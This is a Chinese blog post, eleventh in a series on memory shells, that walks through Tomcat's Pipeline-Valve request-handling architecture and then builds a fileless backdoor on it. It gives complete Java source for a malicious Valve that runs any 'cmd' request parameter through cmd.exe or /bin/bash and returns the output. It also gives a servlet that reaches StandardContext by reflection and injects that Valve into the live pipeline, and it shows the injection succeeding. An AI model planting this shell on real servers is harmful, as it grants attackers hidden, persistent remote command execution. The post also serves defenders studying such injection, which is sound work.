浅析Tomcat架构上的Valve内存马(内存马系列篇十一)

最新推荐文章于 2024-03-17 09:05:44 发布
最新推荐文章于 2024-03-17 09:05:44 发布
阅读量514 收藏 1
点赞数
文章标签: tomcat 架构 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2206/article/details/129241547
版权

写在前面

这篇也是在Tomcat容器上面构造的内存马(收回之前说的不搞Tomcat了),这是建立在Tomcat的管道上面做文章的一个内存马的实现方式。这是内存马系列的第十一篇文章了。

前置

什么是Pipeline-Valve管道?

根据前面Tomcat架构的相关知识,我们是知道对于Tomcat中的Container层有四个容器:

Engine

Host

Context

Wrapper

四个容器的具体实现为。

image-20221001104548654.png

四个容器中都包含有自己的管道对象,管道对象用来存放若干阀门对象。Tomcat为其分别制定了一个默认的基础阀门。

image-20221001104820970.png

四个基础阀门放在各自容器管道的最后一位,用于查找下一级容器的管道在每个容器对象里面都有一个pipeline及valve模块。

在上层容器的管道的BaseValue 中会调用下层容器的管道。

对于Pipeline处理的流程图如下:

image-20221001104936955.png

流程分析

Container 中的Pipeline 在抽象实现类ContainerBase 中定义。

image-20221001112443299.png

而对于上面提到的标准valve实现,他们都继承了ContainerBase类,共同维护了同一个Pipeline对象

并且分别通过调用startInternal/stopInternal/destroyInternal等方法调用相应的生命周期。

image-20221001112845728.png

image-20221001112905560.png

image-20221001112915146.png

而又因为四个组件都是继承ContainerBase,所以,每个组件在执行生命周期的同时也会调用对应方法

我们跟进一下Valve的标准实现StandardPipeline,Tomcat将会通过调用ContainerBase#addValve方法的方式来将所有的valve通过链表的方式组织起来。

image-20221001113925509.png

进而调用的是pipeline.addValve方法,进而是StandardPipeline#addValve方法的调用。

image-20221001114632635.png

因为我并没有配置多余的Valve,所以,这个容器只有一个基础阀(this.first=null)将valve赋值给first变量,并且设置
valve的下一个阀门为基础阀。如果这里的first不为空,遍历阀门链表,将要被添加的阀门设置在 基础阀之前。

对于其生命周期的实现:

因为StandardPipeline类继承至LifecycleBase,
所以其分别调用startInternal/stopInternal/destroyInternal方法来进行执行

startlnternal 方法和stopInternal 方法处理的过程非常相似,都是使用临时变量current 来遍历Value 链里的所有Value
,如果first 为空则使用basic ,然后遍历所有Value 并调用相应的start 和stop
方法,然后设置相应的生命周期状态。destroyInternal 方法是删除所有Value。

image-20221001115859113.png

而该类对于请求处理的方法为:

Connector 在接收到请求后会调用最顶层容器的Pipeline 来处理,顶层容器的Pipeline 处理完之后就会在其BaseValue
里调用下一层容器的Pipeline 进行处理.这样就可以逐层调用所有容器的Pipeline 来处理了

我们可以定位到CoyoteAdapter#service方法中。

image-20221001120136313.png

在进行连接请求的时候,将会获取顶层容器的Pipeline,调用其invoke方法进行处理。

image-20221001120314439.png

虽然对应的StandardPipeline中的first为null,
但是可以调用其getFirst方法,获取到basic中的Valve,这里存放的就是下一层的Valve对象。

image-20221001120505743.png

之后又调用下一层的invoke方法。

image-20221001120742448.png

正文

分析注入

通过上面的分析,我们可以知道,在处理请求的时候,Pipeline管道主要是通过调用Valveinvoke方法来进行处理请求的。

所以,如果我们能够创建一个恶意的Valve,并将其添加进入Valve链中,那么在处理请求的时候,将会调用我们创建的Valve的invoke方法,进而执行恶意代码。

根据上面的分析,我们可以知道,对于Valve的添加,主要是通过StandardPipeline#addValve方法进行添加。

image-20221001124921944.png

将会将我们构建的Valve添加在first之后,basic之前。

实现内存马

总结一下步骤就应该为两步

  1. 创建一个恶意的Valve

  2. 调用StandardPipeline#addValve方法将其添加进Valve链

首先处理第一步,根据前面的分析,一个符合条件的恶意Valve是需要继承ValveBase这个抽象类的。

image-20221001125506003.png

所以我们继承了之后,重写其invoke方法。

package pres.test.momenshell;

import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.Response;
import org.apache.catalina.valves.ValveBase;

import javax.servlet.ServletException;
import java.io.IOException;
import java.util.Scanner;

public class EvilValve extends ValveBase {
    @Override
    public void invoke(Request request, Response response) throws IOException, ServletException {
        String cmd = request.getParameter("cmd");
        if (cmd != null) {
            try {
                java.io.PrintWriter printWriter = response.getWriter();
                ProcessBuilder processBuilder;
                String o = "";
                if (System.getProperty("os.name").toLowerCase().contains("win")) {
                    processBuilder = new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd});
                } else {
                    processBuilder = new ProcessBuilder(new String[]{"/bin/bash", "-c", cmd});
                }
                java.util.Scanner scanner = new Scanner(processBuilder.start().getInputStream()).useDelimiter("\\A");
                o = scanner.hasNext() ? scanner.next() : o;
                scanner.close();
                printWriter.println(o);
                printWriter.flush();
                printWriter.close();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
}

之后第二步就是获取StandardPipeline,调用其addValve方法。

package pres.test.momenshell;

import org.apache.catalina.core.StandardContext;

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.lang.reflect.Field;

public class AddTomcatValve extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        this.doPost(req, resp);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        try {
            ServletContext servletContext = req.getServletContext();
            StandardContext o = null;
            //循环获取 StandardContext对象
            while (o == null) {
                Field context = servletContext.getClass().getDeclaredField("context");
                context.setAccessible(true);
                Object object = context.get(servletContext);

                if (object instanceof ServletContext) {
                    servletContext = (ServletContext) object;
                } else if (object instanceof StandardContext) {
                    o = (StandardContext) object;
                }
            }
            // 添加自定义的Valve
            EvilValve evilValve = new EvilValve("aaa");
            o.getPipeline().addValve(evilValve);
            resp.getWriter().println("add successfully!!");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

这里是直接创建了一个Servlet进行注入,对于如何从当前线程中获取对应的StandardContext对象的各种方法总结将会在后面单独有一篇来讲述。之后在web.xml中进行配置,就可以访问这个Servlet了。

实例

相关的代码上面都有了,我们直接来看看效果,访问/addTomcatValve路由。

image-20221001152228180.png

成功注入内存马,我们测试是否成功注入。

image-20221001152303281.png

明显,成功写入了内存马。

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

上述资料【扫下方二维码】就可以领取了,无偿分享

HarkAllen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tomcat 阀简介
weixin_43882265的博客
02-05 539
Tomcat阀可以加入到3种Catalina容器中,它们是Engine、Host和Context。容器描述Engine可以预处理该Engine接收到的所有HTTP请求Host可以预处理该Host接收到的所有HTTP请求Context可以预处理该Context接收到的所有HTTP请求所有的Tomcat阀都实现了org.apache.Catalina.Valve接口或扩展了org.apache.Catalina.valves.ValveBase类。
Tomcat—— 11.Valve组件
blueicex2017的博客
02-28 1091
valve是处理元素,它可以被包含在每个Tomcat容器的处理路径中–如engine、host、context以及servelt包装器。若要增加ValveTomcat容器则需要在server.xml中使用标签。在server.xml中这些标签的执行顺序与其物理顺序相同。而在Tomcat中也分布这大量预先编译好的valve。包括: 在请求日志元素中将请求(如远程客户端ip地址)写入日志文件或数据库...
Tomcat内存
最新发布
qq_64201116的博客
03-17 813
描述Servlet3.0后允许动态注册组件这一技术的实现有赖于官方对Servlet3.0的升级,Servlet在3.0版本之后能够支持动态注册组件。而Tomcat直到7.x才支持Servlet3.0,因此通过动态添加恶意组件注入内存的方式适合Tomcat7.x及以上。为了便于调试Tomcat,我们先在父项目的pom文件中引入Tomcat依赖关键在于 JSP->可识别类(恶意类)
Tomcat Filter类型内存与查杀技术学习
wangluoanquan111的博客
08-04 878
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
深入研究Tomcat内存的攻击技术
hackzkaq的博客
11-16 204
Tomcat内存Tomcat Memory Shell)是一种利用Apache Tomcat服务器的漏洞,将恶意代码注入Tomcat进程的内存中的攻击技术ServletContextListener:用于监听整个 Servlet 上下文(创建、销毁)ServletContextAttributeListener:对 Servlet 上下文属性进行监听(增删改属性)ServletRequestListener:对 Request 请求进行监听(创建、销毁)
Java内存分配全面浅析
02-25
本文将由浅入深详细介绍Java内存分配的原理,以帮助新手更轻松的学习Java。这类文章网上有很多,但大多比较零碎。本文从认知过程角度出发,将带给读者一个系统的介绍。进入正题前首先要知道的是Java程序运行在JVM...
Java内存模型JMM浅析
02-25
JavaMemoryModel简称JMM,是一系列Java虚拟机平台对开发者提供的多线程环境下的内存可见性、是否可以重排序等问题的无关具体平台的统一的保证。(可能在术语上与Java运行时内存分布有歧义,后者指堆、方法区、线程栈...
浅析java内存模型--JMM(JavaMemoryModel)
02-24
在说Java内存模型之前,我们先说一下Java内存结构,也就是运行时的数据区域:Java虚拟机在执行Java程序的过程中,会把它管理的内存划分为几个不同的数据区域,这些区域都有各自的用途、创建时间、销毁时间
一文带你走入内存
zkaqlaoniao的博客
11-13 166
ServletContextListener:用于监听整个 Servlet 上下文(创建、销毁)ServletContextAttributeListener:对 Servlet 上下文属性进行监听(增删改属性)ServletRequestListener:对 Request 请求进行监听(创建、销毁)ServletRequestAttributeListener:对 Request 属性进行监听(增删改属性)
tomcat管道模式 pipeline与valve详解
09-29
主要介绍了tomcat管道模式 pipeline与valve详解,管道模式就像一条管道把多个对象连接起来,整体看起来就像若干个阀门嵌套在管道中,而处理逻辑就放在阀门上,需要的朋友可以参考下
tomcat架构分析(valve机制)
Gearever
05-21 449
[b][size=medium]出处:[url=http://gearever.iteye.com]http://gearever.iteye.com[/url][/size][/b] 关于tomcat的内部逻辑单元的存储空间已经在相关容器类的blog里阐述了。在每个容器对象里面都有一个pipeline及valve模块。它们是容器类必须具有的模块。在容器对象生成时自动产生。Pipeline就...
Java内存-Tomcat
mole_exp的博客
04-20 798
Java安全_内存-Tomcat
Tomcat内存学习1:Filter型
weixin_43263451的博客
07-20 951
传统的JSP木特征性强,且需要文件落地,容易被查杀。因此现在出现了内存技术。Java内存又称”无文件”,相较于传统的JSP木,其最大的特点就是无文件落地,存在于内存之中,隐蔽性强。filter型内存就是通过动态添加恶意filter组件到正在运行的Tomcat服务器中。导致http请求通过该filter时会执行该filter的恶意代码今天说的时Tomcat内存,其大概分为以下三类Filter型Servlet型Listener型内存利用条件。...
初探Upgrade内存(内存系列六)
小王的储物间
02-20 418
前面讲解了一个特殊的Tomcat内存-Executor内存,这同样是一个特殊,可以不被检测到的内存-Upgrade内存。这就是内存系列文章的第六了。Processor是一个接口,针对于不同协议下具有不同的具体实现类,其实现类的具体功能是处理http请求,主要是对协议进行解析,状态处理以及响应。然后起一个中间作用转发到Adater。首先来看一下实现关系类。好了,第六系列文章也就结束了,这和上一同样可以一定程度上绕过Filter鉴权机制导致内存不可用的情况。
java tomcat内存学习
springgold的博客
01-21 724
1.tomcat 1.tomcat 结构 --Server 顶层容器--Service 提供具体服务的--Connector--Container--Engine--Host--Context--Wrapper--Service Server: 一个Tomcat仅有一个Server,指代整个Web服务器。Connect...
Tomcat服务器配置参考之Valve组件
majiabao123的专栏
05-15 8041
Valve组件概述Valve元素是插入在Catalina容器(包括Engine,Host或者Context)处理流程中的组件。不同的组件有不同的处理能力。下面将对每个Valve组件进行描述以下的描述使用变量$CATALINA_HOME来指Tomcat 5安装的目录。大多数的相对路径都是以该目录为基准。但是,通过设置CA
[Java安全]—Tomcat Listener内存
Sentiment的博客
07-14 3208
内存,也被称为无文件,是无文件攻击的一种常用手段。而无文件攻击呢顾名思义就是不利用shell文件进行攻击,但这里的无文件并不是真的意义上的“无文件”,而是一种攻击思路,是将恶意文件内容以脚本形式存在计算机中的内存、注册表子项目中或者利用系统合法工具以逃避安全检测的方法。servlet-api类○ listener型○ filter型○ servlet型spring类○ 拦截器○ controller型Java Instrumentation类○ agent型顾名思义就是监听器,他能够监听一些事件从而来达
Android智能手机上的音频浅析
06-08
Android智能手机上的音频涉及到多个方面,包括音频采集、音频处理、音频编解码、音频播放等。 在音频采集方面,Android智能手机通常使用手机自带的麦克风或外接麦克风来采集声音。采集的音频数据可以通过Android...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值